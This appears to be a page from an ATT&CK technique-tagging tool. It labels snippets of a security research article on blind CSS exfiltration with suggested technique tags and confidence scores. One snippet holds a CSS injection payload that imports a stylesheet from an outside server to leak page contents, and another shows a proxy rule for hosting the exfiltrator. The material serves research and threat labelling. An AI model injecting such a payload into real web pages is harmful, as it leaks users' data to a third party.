Blind CSS Exfiltration: exfiltrate unknown web pages
ATT&CK techniques detected
T1041Exfiltration Over C2 Channel
96%
"ip the previous session will be deleted. note it ' s better to run the exfiltrator on your own server and our server is unlikely to handle a lot of users. enjoy! < style > @ import ' https : / / portswigger - labs. net / blind - css - exfiltration / start ' ; < / style >"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1041Exfiltration Over C2 Channel
57%
"to host this on a h2 enabled server. otherwise you ' ll get pre - flight requests because of the different protocols. you can use a proxypass rule in apache to forward to the local address : proxypass / blind - css - exfiltration http : / / localhost : 5001 once you have configur…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1588.006Vulnerabilities
43%
"blind css exfiltration : exfiltrate unknown web pages research academy my account customers about blog careers legal contact resellers attack surface visibility improve security posture, prioritize manual testing, free up time. ci - driven scanning more proactive security - find …"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
This is a gif of the exfiltration process (We've increased the speed so you're not waiting around for 1 minute). Read on to discover how this works... CSS Cafe presentation I presented this technique